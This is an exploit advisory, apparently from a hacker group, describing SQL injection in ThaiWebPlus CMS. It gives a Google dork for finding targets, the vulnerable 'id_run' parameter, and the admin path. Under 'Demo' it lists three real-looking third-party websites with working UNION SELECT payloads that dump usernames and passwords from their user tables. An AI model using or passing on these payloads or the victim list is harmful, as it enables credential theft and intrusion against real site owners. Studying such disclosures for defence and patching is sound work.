###################################################
# [+] Exploit Title: ThaiWebPlus CMS Sql Injection Vulnerability
# [+] Google Dork: Powered by ThaiWebPlus
# [+] Exploit Author: Iran Cyber Security Group
# [+] Discovered By: Pi.Hack
# [+] Vendor Homepage: http://thaiwebplus.com
# [+] Version: All version
# [+] Tested on: Windows & Linux
###################################################
# [+] Exploit:
# [+] http://localhost/index.php?Content=product&id_run=[ID]'[Sql Injection]
###################################################
# [+] Proof:
# [+] http://localhost/index.php?Content=product&id_run=[ID]' [Not loaded]
###################################################
# [+] Demo:
# [+] http://www.yXingphaiboon-aquarium.com/index.php?Content=product&id_run=-30+union+select+1,2,3,group_concat%28user,0x3a,pws%29,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+user--
# [+] http://88paXrt.com/index.php?Content=product&id_run=-3+union+select+1,2,3,group_concat%28user,0x3a,pws%29,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+user--
# [+] http://amXpcooling.com/index.php?Content=service&id_run=-1+union+select+1,2,3,group_concat%28user,0x3a,pws%29,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+from+user--
###################################################
# Admin Page:
# site.com/_admin/
###################################################
# Contact mail: uid.root@yahoo.com
# Skype: uid.root
# Home Page : www.Iran-Cyber.Org
# Thanks To : root3r | MOHAMAD-NOFOZI | KamraN HellisH | JOK3R | WH!T3_W01F | CRY$I$ BL4CK | And All Members Of Iran-Cyber.Org
###################################################